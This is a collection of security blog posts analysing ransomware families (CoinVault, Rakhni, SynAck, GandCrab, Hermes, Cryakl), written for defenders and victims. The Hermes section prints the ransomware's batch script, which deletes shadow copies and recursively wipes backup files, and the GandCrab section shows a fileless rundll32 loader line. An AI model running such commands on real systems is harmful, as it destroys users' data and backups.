CoinVault: Caught red-handed

Way back in 2015, Kaspersky Lab helped Dutch cyberpolice catch the creators of one of the very first pieces of ransomware, CoinVault. The decryptor we developed for it inspired the NoRansom portal, where we upload tools for unlocking files after various encryption attacks. Although CoinVault’s creators were caught a while ago, the first court hearing took place recently, and our expert Jornt van der Wiel attended.

CoinVault ran riot in 2014 and 2015 through dozens of countries around the world. Our experts estimate the number of victims at more than 10,000. Behind the attacks were two Dutch brothers, aged 21 and 25, who developed and distributed the Trojan. Every victim received a ransom demand for 1 bitcoin, which at the time was worth about 200 euros. The pair snagged about 20,000 euros as a result.

CoinVault was ahead of its time. In addition to encryption, it had features that we still see in ransomware Trojans today. For example, the victim was allowed to decrypt one file free. Mentally, this plays into the hands of the cybercriminals: When victims realize they are one click away from recovering their vital data, the temptation to pay up becomes stronger. The on-screen timer is another of CoinVault’s psychological teasers, inexorably counting down to a higher ransom demand.


Double Dutch

We studied CoinVault and described its structure in detail in late 2014. The malware authors took great pains to hide it from security solutions and hinder its analysis. The ransomware can determine, for example, whether it is being run in a sandbox, and its code is heavily obfuscated.

Nevertheless, our experts were able to get to the source code and find a clue that ultimately led to the criminals’ arrest: It contained some comments in Dutch. It was fairly likely that the malware hailed from the Netherlands.

We passed the information to the Dutch cyberpolice, and within a few months they reported the successful capture of the campaign masterminds. Thanks to our cooperation with the Dutch police, we managed to obtain the keys from the C&C server and develop a data decryption tool.


Lady Justice weighs the evidence

The police collected almost 1,300 statements from victims of the ransomware. Some of them appeared in court personally to demand compensation. One victim, for example, had their vacation ruined by the ransomware. They estimated the damage at 5,000 euros, saying that this sum would enable them to pay for another trip.

Another victim asked for the ransom to be paid back in the same coin — bitcoin. Since the attack, the cryptocurrency exchange rate has risen almost thirtyfold, so if the court satisfies the claim, it will be the first time that an injured party has earned money from a ransomware attack.

At the recent hearing, the prosecutors demanded punishment in the form of three months’ imprisonment, followed by a nine-month suspended sentence and 240 hours’ community service. The defense asked the court not to put the brothers behind bars, arguing that the defendants had cooperated with the investigation, plus one is irreplaceable in his current job and the other is in college. The verdict will be delivered at the next hearing, on July 26.


Trespassers will be prosecuted

We always say that giving in to criminals only encourages them. The trial of the CoinVault creators shows that even seemingly anonymous cybercriminals cannot escape punishment. But instead of waiting three years for justice, it’s better to protect yourself in advance. Remember our standard tips:

  • Don’t click on suspicious links and don’t open suspicious e-mail attachments.
  • Make regular backups of important files.
  • Use a reliable security solution.

Author: Anna Markovskaya

Rakhni Trojan: To encrypt and to mine

We recently posted that ransomware is giving way to miners at the top of the online threat rankings. In line with this trend, the Trojan ransomware Rakhni, which we’ve been watching since 2013, has added a cryptocurrency mining module to its arsenal. What’s interesting is that the malware loader is able to choose which component to install depending on the device. Our researchers figured out how the updated malware works and where the danger lies.

Our products spotted Rakhni in Russia, Kazakhstan, Ukraine, Germany, and India. The malware is distributed mainly through spam mailings with malicious attachments. The sample that our experts studied, for example, was disguised as a financial document. This suggests that the cybercriminals behind it are primarily interested in corporate “clients.”

A DOCX attachment in a spam e-mail contains a PDF document. If the user allows editing and tries to open the PDF, the system requests permission to run an executable file from an unknown publisher. With the user’s permission, Rakhni swings into action.


Like a thief in the night

When it’s started, the malicious PDF file appears to be a document viewer. First, the malware shows the victim an error message explaining why nothing has opened. Next, it disables Windows Defender and installs forged digital certificates. Only when the coast seems clear does it decide what to do with the infected device — encrypt files and demand ransom or install a miner.

Finally, the malicious program tries to spread to other computers inside the local network. If company employees have shared access to the Users folder on their devices, the malware copies itself onto them.


Mine or encrypt?

The selection criterion is simple: If the malware finds a service folder called Bitcoin on the victim’s computer, it runs a piece of ransomware that encrypts files (including Office docs, PDFs, images, and backups) and demands a ransom payment within three days. Details of the ransom, including how much, the cybercriminals kindly promise to send by e-mail.

If there are no Bitcoin-related folders on the device, and the malware believes it has enough power to handle cryptocurrency mining, it downloads a miner that surreptitiously generates Monero, Monero Original, or Dashcoin tokens in the background.


Author: Julia Glazova

SynAck ransomware: The doppelgängster

Malware tends to evolve, with crooks adding new functions and techniques to help it avoid detection by antivirus programs. Sometimes, the evolution is rather rapid. For example, SynAck ransomware, which has been known since September 2017 (when it was just average, not particularly clever), has recently been overhauled to become a very sophisticated threat that avoids detection with unprecedented effectiveness and uses a new technique called Process Doppelgänging.


Sneak attack

Malware creators commonly use obfuscation — attempts to make the code unreadable so that antiviruses will not recognize the malware — typically employing special packaging software for that purpose. However, antivirus developers caught on, and now antivirus software effortlessly unpacks such packages. The developers behind SynAck chose another way that requires more effort on both sides: thoroughly obfuscating the code before compiling it, making detection significantly harder for security solutions.

That’s not the only evasion technique the new version of SynAck uses. It also employs a rather complicated Process Doppelgänging technique — and it is the first ransomware seen in the wild to do so. Process Doppelgänging was first presented at Black Hat 2017 by security researchers, after which it was picked up by malefactors and used in several malware species.

Process Doppelgänging relies on some features of the NTFS file system and a legacy Windows process loader that exists in all Windows versions since Windows XP, letting developers create fileless malware that can pass off malicious actions as harmless, legitimate processes. The technique is complicated; to read more about it, see Securelist’s more detailed post on the topic.

SynAck has two more noteworthy features. First, it checks if it’s installed in the right directory. If it’s not, it doesn’t run — that’s an attempt to avoid detection by the automatic sandboxes various security solutions use. Second, SynAck checks if it’s installed on a computer with a keyboard set to a certain script — in this case, Cyrillic — in which case it also does nothing. That’s a common technique for restricting malware to specific regions.


The usual crime

From the user’s perspective, SynAck is just more ransomware, notable mainly for its steep demand: $3,000. Before encrypting a user’s files, SynAck ensures it has access to its important file targets by killing some processes that would otherwise keep the files in use and off limits.

The victim sees the ransom note, including contact instructions, on the logon screen. Unfortunately, SynAck uses a strong encryption algorithm, and no flaws have been found in its implementation, so there is no way yet to decrypt the encrypted files.

We have seen SynAck distributed mostly by Remote Desktop Protocol brute force, which means it’s mostly targeted at business users. The limited number of attacks thus far — all of them in the USA, Kuwait, and Iran — bears out this hypothesis.


Getting ready for the next generation of ransomware

Even if SynAck is not coming for you, its existence is a clear sign that ransomware is evolving, becoming more and more sophisticated and harder to protect against. Decryptor utilities will appear less frequently as attackers learn to avoid the mistakes that made the creation of those decryptors possible. And despite ceding ground to hidden miners (just as we predicted), ransomware is still a big global trend, and knowing how to protect against all such threats is a must for every Internet user.

Author: Alex Perekalin

Magnitude exploit kit switches to GandCrab ransomware

The GandCrab ransomware is reaching far and wide via malspam, social engineering schemes, and exploit kit campaigns. On April 16, we discovered that Magnitude EK, which had been loyal to its own Magniber ransomware, was now being leveraged to push out GandCrab, too.

While Magnitude EK remains focused on targeting South Koreans, we were able to infect an English version of Windows by replaying a previously recorded infection capture. This is an interesting departure from Magniber, which was extremely thorough at avoiding other geolocations.

Magnitude is now also using a fileless technique to load the ransomware payload, making it somewhat harder to intercept and detect. Variations of this technique have been known for several years and used by other malware families, such as Poweliks, but they are a new addition to Magnitude.

Figure 1: Magnitude EK traffic capture with the GandCrab payload

Magnitude has always experimented with unconventional ways to load its malware, for example via binary padding, or more recently via another technique, but still exposing it “in the clear” from traffic or network packet capture.

Figure 2: Magnitude EK dropping Magniber on April 4, 2018

The payload is encoded (using VBScript.Encode/JScript.Encode) and embedded in a scriptlet that is later decoded in memory and executed.

"C:\Windows\System32\rundll32.exe" javascript:"\..\mshtml,RunHTMLApplication ";

Figure 3: Innocuous scriptlet hides the payload

After the payload is injected into explorer.exe, it immediately attempts to reboot the machine. If we suspend that process and use @hasherezade’s PE-Sieve, we can actually dump the GandCrab DLL from memory:

Figure 4: Extracting the payload from memory using PE-Sieve

Upon successful infection, files will be encrypted with the .CRAB extension while a ransom note is left with instructions on the next steps required to recover those files.

Figure 5: GandCrab’s ransom note

A recent law enforcement operation provided victims with a way to recover their files from previous GandCrab infections. However, the latest version cannot be decrypted at the moment.

Malwarebytes users are protected against this attack when either the Internet Explorer (CVE-2016-0189) or Flash Player (CVE-2018-4878) exploits are fired.

Time will tell if Magnitude sticks to GandCrab, but this is a noteworthy change for an exploit kit that solely used its own Magniber ransomware for about 7 months, after having replaced the trusted Cerber.

Indicators of compromise

Dumped GandCrab DLL


The post Magnitude exploit kit switches to GandCrab ransomware appeared first on Malwarebytes Labs.

Author: Jérôme Segura

Hermes ransomware distributed to South Koreans via recent Flash zero-day

This blog post was authored by @hasherezade, Jérôme Segura and Vasilios Hioureas.

At the end of January, the South Korean Emergency Response Team (KrCERT) published news of a Flash Player zero-day used in targeted attacks. The flaw, which exists in Flash Player and below, was distributed via malicious Office documents containing the embedded Flash exploit. Only a couple of weeks after the public announcement, spam campaigns were already beginning to pump out malicious Word documents containing the newly available exploit.

While spam has been an active distribution channel for some time now, the news of a Flash exploit would most certainly interest exploit kit authors as well. Indeed, in our previous blog post about this vulnerability (CVE-2018-4878), we showed how trivial it was to take an already available Proof-of-Concept and package it as a drive-by download instead.

On March 9th, MDNC discovered that a less common but more sophisticated exploit kit called GreenFlash Sundown had started to use this recent Flash zero-day to distribute the Hermes ransomware. This payload was formerly used as part of an attack on a Taiwanese bank and suspected to be the work of a North Korean hacking group. According to some reports, it may be a decoy attack and “pseudo-ransomware.”

By checking on the indicators published by MDNC, we were able to identify this campaign within our telemetry and noticed that all exploit attempts were made against South Korean users. Based on our records, the first hit happened on February 27, 2018, (01:54 UTC) via a compromised Korean website.

We replayed this attack in our lab and spent a fair amount of time looking for redirection code within the JavaScript libraries that are part of the self-hosted OpenX server. Instead, we found that it was hiding in the main page’s source code.

We had already pinpointed where the redirection was happening by checking the DOM on the live page, but we also confirmed it by decoding the large malicious blurb that went through Base64 and RC4 encoding (we would like to thank David Ledbetter for that).

Hermes ransomware

The payload from this attack is Hermes ransomware, version 2.1.

Behavioral analysis

The ransomware copies itself into %TEMP% under the name svchosta.exe and redeploys itself from that location. The initial sample is then deleted.

The ransomware is not particularly stealthy—some windows pop up during its run. For example, we are asked to run a batch script with administrator privileges:

The authors didn’t bother to deploy any UAC bypass technique, relying only on social engineering for this. The pop-up is deployed in a loop, and in this way it tries to force the user into accepting it. But even if we don’t let the batch script be deployed, the main executable proceeds with encryption.

The batch script is responsible for removing the shadow copies and other possible backups:

It is dropped inside C:\Users\Public along with some other files:

The file “PUBLIC” contains a blob with an RSA public key. It is worth noting that this key is unique on each run, so the RSA key pair is generated per victim. Example:

Another file is an encrypted block of data named UNIQUE_ID_DO_NOT_REMOVE. It is a blob containing an encrypted private RSA key, unique for the victim:

Analyzing the blob header, we find the following information:

The rest of the data is encrypted—at this moment, we can guess that it is encrypted by the RSA public key of the attackers.

The same folder also contains a ransom note. When the encryption finished, the ransom note pops up. The note is in HTML format, named DECRYPT_INFORMATION.html.

The interesting fact is that, depending on the campaign, in some of the samples the authors used BitMessage to communicate with victims:

This method was used in the past by a few other authors, for example in Chimera ransomware, and by the author of original Petya in his affiliate programs.

Encrypted files don’t have their names changed. Each file is encrypted with a new key, so the same plaintext produces different ciphertexts. The entropy of the encrypted file is high, and no patterns are visible. That suggests that a stream cipher or a cipher with chained blocks was used. (The most common choice in such cases is AES in CBC mode, but we can be sure only after analyzing the code.) Below, you can see a visualization of a BMP file before and after being encrypted by Hermes:


Inside each file, after the encrypted content, there is a “HERMES” marker, followed by another blob:

This time the blob contains an exported session key (0x01 : SIMPLEBLOB) and the algorithm identifier is AES (0x6611: CALG_AES). We can make an educated guess that it is the AES key for the file, encrypted by the victim’s RSA key (from the generated pair).

The ransomware achieves persistence by dropping a batch script in the Startup folder:

The script is simple; its role is just to deploy the dropped ransomware: svchosta.exe.

So, on each system startup it will make a check for new, unencrypted files and try to encrypt them. That’s why, as soon as one discovers that they have been attacked by this ransomware, they should remove the persistence entry in order to not let the attack repeat itself.

Inside the ransomware

Execution flow

At the beginning of the execution, the ransomware creates a mutex named “tech”:

The sample is mildly obfuscated; for example, its imports are loaded at runtime. The .data section of the PE file is also decrypted during execution, so at first we do not see the typical strings.

First, the executable begins to dynamically load all its imports via a function at 4023e0:

It then checks the registry key for a language code. If Russian, Belarusian, or Ukrainian is found as the system language, it exits the process (0x419 being Russian, 0x422 Ukrainian, and 0x423 Belarusian).

It then spawns two cmd.exe subprocesses: one that copies the executable into the directory appdata/local/temp/svchost.exe, and another that executes the copied file.

It also generates crypto keys using the standard CryptAcquireContext API, and saves the public key and some kind of ID into the following files:



As mentioned earlier, it writes a script into the Start menu Startup folder so that it runs automatically at startup; its contents are start "" %TEMP%\svchosta.exe. This is quite simple and conspicuous. Since it is always running and keeps persistence, it makes sense that it saved the public key to a file so that it can later find that key and continue encrypting with a consistent key across all executions.

Below is the function that calls all of this functionality sequentially, labeled:

It proceeds to cycle through all available drives, skipping any CD-ROM drive. Inside the function, it walks all files and folders on the drive but skips a few key directories, including, but not limited to, Windows, Mozilla, and the Recycle Bin.

Inside of the function labeled recursiveSearch_Encrypt are the checks for key folders and drive type:

It then continues on to enumerate netResources and encrypts those files as well. After encryption, it creates another bat file called window.bat to delete shadow volume and backup files. Here is its content:

vssadmin Delete Shadows /all /quiet
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB
vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB
vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB
vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB
vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB
vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded
vssadmin Delete Shadows /all /quiet
del /s /f /q c:\*.VHD c:\*.bac c:\*.bak c:\*.wbcat c:\*.bkf c:\Backup*.* c:\backup*.* c:\*.set c:\*.win c:\*.dsk
del /s /f /q d:\*.VHD d:\*.bac d:\*.bak d:\*.wbcat d:\*.bkf d:\Backup*.* d:\backup*.* d:\*.set d:\*.win d:\*.dsk
del /s /f /q e:\*.VHD e:\*.bac e:\*.bak e:\*.wbcat e:\*.bkf e:\Backup*.* e:\backup*.* e:\*.set e:\*.win e:\*.dsk
del /s /f /q f:\*.VHD f:\*.bac f:\*.bak f:\*.wbcat f:\*.bkf f:\Backup*.* f:\backup*.* f:\*.set f:\*.win f:\*.dsk
del /s /f /q g:\*.VHD g:\*.bac g:\*.bak g:\*.wbcat g:\*.bkf g:\Backup*.* g:\backup*.* g:\*.set g:\*.win g:\*.dsk
del /s /f /q h:\*.VHD h:\*.bac h:\*.bak h:\*.wbcat h:\*.bkf h:\Backup*.* h:\backup*.* h:\*.set h:\*.win h:\*.dsk
del %0
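The script above gives a defender three concrete behaviours to alert on. The following is an added example (not code from the Malwarebytes analysis) that runs those three patterns over process-creation records and flags a host only when the combination appears, since a lone vssadmin call is routine administration. The record format (timestamp|host|parent image|image|command line) and the sample events are constructed for the example; map them to whatever your EDR or Sysmon pipeline emits.

```python
"""Detection logic for the backup-wiping batch script used by Hermes.

Added example, not code from the Malwarebytes analysis. It runs the three
behaviours visible in window.bat (shadow copy deletion, shadow storage
resizing, and the recursive deletion of backup files) over process-creation
records. The record format below is constructed for the example
(timestamp|host|parent image|image|command line).
"""
import re

# Each rule is a regex over the command line, derived from window.bat above.
RULES = [
    ("vss_delete_shadows",
     re.compile(r"\bvssadmin(?:\.exe)?\s+delete\s+shadows\b.*/all", re.I)),
    ("vss_resize_shadowstorage",
     re.compile(r"\bvssadmin(?:\.exe)?\s+resize\s+shadowstorage\b", re.I)),
    ("backup_file_wipe",
     re.compile(r"\bdel\b(?:\s+/[sfq])+\s+.*\.(?:vhd|bac|bak|wbcat|bkf)\b", re.I)),
]

# Constructed sample telemetry: three events from the script on WS01 and one
# benign administrative use of vssadmin on WS02.
SAMPLE_LOG = """\
2018-03-09T10:02:11Z|WS01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\vssadmin.exe|vssadmin Delete Shadows /all /quiet
2018-03-09T10:02:12Z|WS01|C:\\Windows\\System32\\cmd.exe|C:\\Windows\\System32\\vssadmin.exe|vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB
2018-03-09T10:02:13Z|WS01|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\cmd.exe|cmd.exe /c del /s /f /q c:\\*.VHD c:\\*.bac c:\\*.bak c:\\*.wbcat c:\\*.bkf
2018-03-09T10:30:00Z|WS02|C:\\Windows\\explorer.exe|C:\\Windows\\System32\\vssadmin.exe|vssadmin list shadows
"""


def parse_record(line):
    """Split one constructed pipe-separated record into its fields."""
    ts, host, parent, image, cmdline = line.split("|", 4)
    return {"ts": ts, "host": host, "parent": parent, "image": image, "cmdline": cmdline}


def match_rules(cmdline):
    """Names of all rules that fire on one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def analyze(log_text):
    """Group rule hits per host.

    A single vssadmin call is routine administration; the Hermes script is
    characterised by the combination, so a host is flagged as hermes_like
    only when at least two distinct rules fired on it.
    """
    per_host = {}
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_record(raw)
        hits = match_rules(rec["cmdline"])
        if hits:
            per_host.setdefault(rec["host"], set()).update(hits)
    return {host: {"rules": sorted(names), "hermes_like": len(names) >= 2}
            for host, names in per_host.items()}


if __name__ == "__main__":
    for host, finding in analyze(SAMPLE_LOG).items():
        print(host, finding)
```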

It then creates and executes another bat file called svchostaaexe.bat that cycles through the entire file system again to search for and delete all backup files. This is interesting, as we have rarely seen ransomware looking in so much detail for backup files.

There is no functionality that communicates a decryption key to a C2 server. This means that the file UNIQUE_ID_DO_NOT_REMOVE, which contains the unique ID you have to send to the email address, must be encrypted by a public key pair that the attackers have pre-generated and retained on their side.

We have found that there is a heavy code reuse from the old versions of Hermes with this one. The flow of the code looks to be a bit different, but the overall functionality is the same. This is quite clear when comparing the two versions in a disassembler.

Below are two screenshots: the first from the current version we are analyzing, and the second from the old version. You can clearly see that even though the flow and arrangement are a bit different, the functionality remains mostly the same.

The new version:

And the old version 237eee069c1df7b69cee2cc63dee24e6:

Attacked targets

The ransomware attacks the following extensions:

tif php 1cd 7z cd 1cd dbf ai arw txt doc docm docx zip rar xlsx xls xlsb xlsm jpg jpe jpeg bmp db eql sql adp mdf frm mdb odb odm odp ods dbc frx db2 dbs pds pdt pdf dt cf cfu mxl epf kdbx erf vrp grs geo st pff mft efd 3dm 3ds rib ma max lwo lws m3d mb obj x x3d c4d fbx dgn dwg 4db 4dl 4mp abs adn a3d aft ahd alf ask awdb azz bdb bib bnd bok btr bak cdb ckp clkw cma crd dad daf db3 dbk dbt dbv dbx dcb dct dcx ddl df1 dmo dnc dp1 dqy dsk dsn dta dtsx dxl eco ecx edb emd fcd fic fid fil fm5 fol fp3 fp4 fp5 fp7 fpt fzb fzv gdb gwi hdb his ib idc ihx itdb itw jtx kdb lgc maq mdn mdt mrg mud mwb s3m myd ndf ns2 ns3 ns4 nsf nv2 nyf oce oqy ora orx owc owg oyx p96 p97 pan pdb pdm phm pnz pth pwa qpx qry qvd rctd rdb rpd rsd sbf sdb sdf spq sqb stp str tcx tdt te tmd trm udb usr v12 vdb vpd wdb wmdb xdb xld xlgc zdb zdc cdr cdr3 ppt pptx abw act aim ans apt asc ase aty awp awt aww bad bbs bdp bdr bean bna boc btd cnm crwl cyi dca dgs diz dne docz dot dotm dotx dsv dvi dx eio eit emlx epp err etf etx euc faq fb2 fbl fcf fdf fdr fds fdt fdx fdxt fes fft flr fodt gtp frt fwdn fxc gdoc gio gpn gsd gthr gv hbk hht hs htc hwp hz idx iil ipf jis joe jp1 jrtf kes klg knt kon kwd lbt lis lit lnt lp2 lrc lst ltr ltx lue luf lwp lyt lyx man map mbox me mell min mnt msg mwp nfo njx now nzb ocr odo odt ofl oft ort ott p7s pfs pfx pjt prt psw pu pvj pvm pwi pwr qdl rad rft ris rng rpt rst rt rtd rtf rtx run rzk rzn saf sam scc scm sct scw sdm sdoc sdw sgm sig sla sls smf sms ssa stw sty sub sxg sxw tab tdf tex text thp tlb tm tmv tmx tpc tvj u3d u3i unx uof uot upd utf8 utxt vct vnt vw wbk wcf wgz wn wp wp4 wp5 wp6 wp7 wpa wpd wpl wps wpt wpw wri wsc wsd wsh wtx xdl xlf xps xwp xy3 xyp xyw ybk yml zabw zw abm afx agif agp aic albm apd apm apng aps apx art asw bay bm2 bmx brk brn brt bss bti c4 cal cals can cd5 cdc cdg cimg cin cit colz cpc cpd cpg cps cpx cr2 ct dc2 dcr dds dgt dib djv djvu dm3 dmi vue dpx wire drz dt2 dtw dvl ecw eip exr fal fax fpos fpx g3 gcdp gfb gfie ggr gif gih 
gim spr scad gpd gro grob hdp hdr hpi i3d icn icon icpr iiq info ipx itc2 iwi j j2c j2k jas jb2 jbig jbmp jbr jfif jia jng jp2 jpg2 jps jpx jtf jwl jxr kdc kdi kdk kic kpg lbm ljp mac mbm mef mnr mos mpf mpo mrxs myl ncr nct nlm nrw oc3 oc4 oc5 oci omf oplc af2 af3 asy cdmm cdmt cdmz cdt cgm cmx cnv csy cv5 cvg cvi cvs cvx cwt cxf dcs ded dhs dpp drw dxb dxf egc emf ep eps epsf fh10 fh11 fh3 fh4 fh5 fh6 fh7 fh8 fif fig fmv ft10 ft11 ft7 ft8 ft9 ftn fxg gem glox hpg hpgl hpl idea igt igx imd ink lmk mgcb mgmf mgmt mt9 mgmx mgtx mmat mat otg ovp ovr pcs pfv pl plt vrml pobj psid rdl scv sk1 sk2 ssk stn svf svgz sxd tlc tne ufr vbr vec vml vsd vsdm vsdx vstm stm vstx wpg vsm xar yal orf ota oti ozb ozj ozt pal pano pap pbm pc1 pc2 pc3 pcd pdd pe4 pef pfi pgf pgm pi1 pi2 pi3 pic pict pix pjpg pm pmg pni pnm pntg pop pp4 pp5 ppm prw psdx pse psp ptg ptx pvr px pxr pz3 pza pzp pzs z3d qmg ras rcu rgb rgf ric riff rix rle rli rpf rri rs rsb rsr rw2 rwl s2mv sci sep sfc sfw skm sld sob spa spe sph spj spp sr2 srw ste sumo sva save ssfn t2b tb0 tbn tfc tg4 thm tjp tm2 tn tpi ufo uga vda vff vpe vst wb1 wbc wbd wbm wbmp wbz wdp webp wpb wpe wvl x3f y ysp zif cdr4 cdr6 cdrw ddoc css pptm raw cpt pcx pdn png psd tga tiff tif xpm ps sai wmf ani flc fb3 fli mng smil svg mobi swf html csv xhtm dat


Hermes, like many other ransomware, uses AES along with RSA for the encryption. AES is used to encrypt files with a random key. RSA is used to protect the random AES key.

The ransomware uses two RSA key pairs, one of them being a hardcoded RSA public key belonging to the attackers.

Then, there is a keypair for the victim. It is generated at the beginning of the attack. The private key from this key pair is encrypted by the attackers’ public key and stored in the file UNIQUE_ID_DO_NOT_REMOVE.

When the victim sends this file, the attackers can recover the victim’s private key with the help of their own private key. The victim’s public key is stored in PUBLIC in clear text. It is later used to encrypt random AES keys, generated per file.

Cryptography is implemented with the help of Windows Crypto API. Function calls are mildly obfuscated, and pointers to the functions are manually loaded.

Each file processing starts from checking if it was already encrypted. The ransomware uses the saved marker “HERMES” that we already saw during the behavioral analysis. The marker is stored at the end of the file, before the block where the AES key is saved. Its offset is 274 bytes from the end. So, first the file pointer is set at this position to make a check of the characters.

If the marker was found, the file is skipped. Otherwise, it is processed further. As we noticed during the behavioral analysis, each file is encrypted with a new key. Looking at the code, we can find the responsible function. Unfortunately for the victims, the authors used the secure function CryptGenKey:

The identifier used for the algorithm is 0x6610 (CALG_AES_256). That means AES with a 256-bit key is used. This key is used to encrypt the content of the file. The file is read and encrypted in chunks of 1,000,000 bytes each.

At the end, the marker “HERMES” is written and the exported AES key is saved:

The handle to the attacker’s RSA public key is passed, so the function CryptExportKey automatically takes care of protecting the AES key. Only the owner of the RSA private key will be able to import it back.
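The file layout described above (ciphertext, then the “HERMES” marker 274 bytes from the end, then the exported AES key as a SIMPLEBLOB) is enough for a defender to confirm which files were touched before restoring from backup. The following triage helper is an added example, not code from the Malwarebytes analysis; it relies only on the documented CryptoAPI SIMPLEBLOB layout (BLOBHEADER, key-exchange ALG_ID, RSA-wrapped session key), and the sample file it builds is constructed, with random bytes standing in for the ciphertext and the wrapped key.

```python
"""Triage helper for files encrypted by Hermes 2.1.

Added example, not code from the Malwarebytes analysis. It applies the file
layout described in the analysis from the defender's side: a "HERMES" marker
274 bytes from the end of the file, followed by the AES session key exported
with CryptExportKey as a SIMPLEBLOB. It identifies affected files; it cannot
decrypt anything.
"""
import os
import struct

MARKER = b"HERMES"
MARKER_OFFSET_FROM_END = 274                        # from the analysis
TRAILER_LEN = MARKER_OFFSET_FROM_END - len(MARKER)  # 268 bytes of SIMPLEBLOB

# CryptoAPI constants from wincrypt.h
SIMPLEBLOB = 0x01
CUR_BLOB_VERSION = 0x02
CALG_AES = 0x6611
CALG_AES_256 = 0x6610
CALG_RSA_KEYX = 0xA400
ALG_NAMES = {CALG_AES: "CALG_AES", CALG_AES_256: "CALG_AES_256",
             CALG_RSA_KEYX: "CALG_RSA_KEYX"}


def parse_simpleblob(blob):
    """Parse a SIMPLEBLOB as produced by CryptExportKey.

    Layout (documented CryptoAPI format): BLOBHEADER {bType, bVersion,
    reserved, aiKeyAlg} (8 bytes), ALG_ID of the key-exchange key (4 bytes),
    then the session key encrypted with that key-exchange (RSA) key.
    """
    if len(blob) < 12:
        raise ValueError("blob too short for BLOBHEADER + ALG_ID")
    b_type, b_version, _reserved, key_alg = struct.unpack_from("<BBHI", blob, 0)
    (keyx_alg,) = struct.unpack_from("<I", blob, 8)
    if b_type != SIMPLEBLOB:
        raise ValueError("not a SIMPLEBLOB (bType=%#x)" % b_type)
    wrapped = blob[12:]
    return {
        "version": b_version,
        "key_alg": key_alg,
        "key_alg_name": ALG_NAMES.get(key_alg, "unknown"),
        "keyx_alg": keyx_alg,
        "keyx_alg_name": ALG_NAMES.get(keyx_alg, "unknown"),
        "wrapped_key": wrapped,
        # The wrapped key is modulus-sized, so its length gives the RSA key
        # size: 268 - 12 = 256 bytes means a 2048-bit victim key. This is an
        # inference from the layout, not a figure stated in the analysis.
        "rsa_bits": len(wrapped) * 8,
    }


def inspect_file(data):
    """Return None if `data` carries no Hermes trailer, else the parsed trailer.

    This is the same check the ransomware makes (marker at offset -274) to
    skip files it has already processed, reused here for triage.
    """
    if len(data) < MARKER_OFFSET_FROM_END:
        return None
    tail = data[-MARKER_OFFSET_FROM_END:]
    if tail[:len(MARKER)] != MARKER:
        return None
    info = parse_simpleblob(tail[len(MARKER):])
    info["ciphertext_len"] = len(data) - MARKER_OFFSET_FROM_END
    return info


def build_sample(ciphertext_len=1000, key_alg=CALG_AES_256):
    """Constructed stand-in for an encrypted file, for exercising the parser.

    Random bytes replace the AES ciphertext and the RSA-wrapped key; no real
    encryption is performed.
    """
    header = struct.pack("<BBHI", SIMPLEBLOB, CUR_BLOB_VERSION, 0, key_alg)
    header += struct.pack("<I", CALG_RSA_KEYX)
    wrapped = os.urandom(TRAILER_LEN - len(header))  # 256 bytes
    return os.urandom(ciphertext_len) + MARKER + header + wrapped


if __name__ == "__main__":
    print(inspect_file(build_sample()))
    print(inspect_file(b"plain document, never touched"))
```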


Malwarebytes users are protected against this Flash Player exploit. In addition, the ransomware payload was blocked at zero-hour strictly based on its malicious behaviour.


Another campaign that we know of targeting South Koreans specifically is carried by malvertising and uses the Magnitude exploit kit, which also delivers ransomware—namely Magniber. That particular infection chain goes to great lengths to only infect this particular demographic, via geo-aware traffic redirection and language checks within the malware code itself.

After analyzing the sample, we found it to be a fully functional ransomware. However, we cannot be sure what the real motivations of the distributors were. Looking at the full context, we may suspect that it was politically motivated rather than a profit-driven attack.

Although the infection vector appeared to narrow down to South Korea, the malware itself, unlike Magniber, does not specifically target these users. The fact that the ransomware excludes certain countries like Russia or Ukraine could tie the development and outsourcing of the malware to these areas or be a false flag. As we know, attribution is always a complex topic.

Indicators of compromise

Domains involved in campaign:


IP addresses:

  • 159.65.131[.]94
  • 207.148.104[.]5

Hermes 2.1 ransomware:

  • A5A0964B1308FDB0AEB8BD5B2A0F306C99997C7C076D66EB3EBCDD68405B1DA2
  • pretty040782@gmail[.]com
  • pretty040782@keemail[.]me

The post Hermes ransomware distributed to South Koreans via recent Flash zero-day appeared first on Malwarebytes Labs.

Author: Malwarebytes Labs

Cryakl/Fantomas victims rescued by new decryptor

The No More Ransom project for assisting victims of ransomware has good news to report: The Belgian police, in cooperation with Kaspersky Lab, managed to obtain keys for recovering files encrypted with new versions of Cryakl ransomware, also known as Fantomas. The updated decryption tool is already available on the project’s website.


What is Cryakl?

The Trojan ransomware Cryakl (Trojan-Ransom.Win32.Cryakl) has been . At first, it was distributed through attached archives in e-mails that appeared to come from an arbitration court in connection with some alleged wrongdoing. There is something about such messages that sets nerves to jangling, and even those who know better might be inclined to click on the attachment. Later, the e-mails diversified, looking like messages from other organizations, such as a local homeowners’ association.

When encrypting files on a victim’s computer, Cryakl creates a long key that it sends to a command-and-control (C&C) server. Without this key, it is nearly impossible to recover files impacted by the malware. After that, Cryakl replaces the desktop wallpaper with contact details for its creators together with a ransom demand. Cryakl also displays an image of the mask of the 1964 French movie villain Fantomas, hence its alternative name. Cryakl mostly targeted users in Russia, so information about it is mostly available in Russian.


Success story

As we already said, the joint efforts of our experts and Belgian police resulted in obtaining the master keys. The investigation began when the computer crime unit learned about victims of the ransomware in Belgium, and then they discovered a C&C server in a neighboring country. An operation led by the Belgian federal prosecutor neutralized the server, along with several other C&C servers that received master keys from infected machines. Then Kaspersky Lab stepped in to assist the law enforcement agencies, not for the first time. As before, the results were first-class: Our experts helped analyze the data found and extract the decryption keys.

